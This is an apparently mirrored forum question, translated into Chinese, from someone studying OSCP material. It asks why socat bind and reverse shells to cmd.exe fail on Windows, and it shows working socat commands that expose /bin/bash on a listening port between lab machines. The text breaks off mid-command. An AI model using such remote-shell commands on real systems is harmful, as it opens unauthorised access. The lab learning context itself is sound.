那些遇到过的问题

小编R4Z*_*Z3X的帖子

Socat - 如何创建 Windows 反向外壳

我最近升级了我的 OSCP 材料以获得新的 OSCP 2020 版,我遇到了 socat 的章节来创建加密的绑定外壳/反向外壳。我以为我了解如何使用它,但是我尝试将加密的反向 shell 从我的 Windows 机器发送到我的 Kali 机器一直没有成功。我决定在双方都使用未加密的绑定外壳进行一些试验和错误。

这是对我有用的:

  • Kali Bind Shell(通过连接到kali 绑定的shell 套接字在Windows 上获取/bin/bash)
  • Kali Reverse Shell(通过将 /bin/bash 发送到 Windows 侦听套接字来获取 Windows 上的 /bin/bash)

以下是对我不起作用的内容:

  • Windows Bind Shell(通过连接到 Windows 侦听 shell 套接字获取 cmd.exe)
  • Windows 反向 Shell(通过将 cmd.exe 发送到 Kali 侦听套接字来获取它)

这是我所做的:

Kali 绑定外壳 - 好的

卡利 (192.168.119.145)

socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash

Windows 10 (192.168.145.10)

socat -d -d -d - TCP4:192.168.119.145:4444

Kali 反向壳 - 好的

Windows 10 (192.168.145.10)

socat -d -d -d …

linux windows bash shell

R4Z*_*Z3X
2020 11-12
6
推荐指数
1
解决办法
1万
查看次数

标签 统计

bash ×1

linux ×1

shell ×1

windows ×1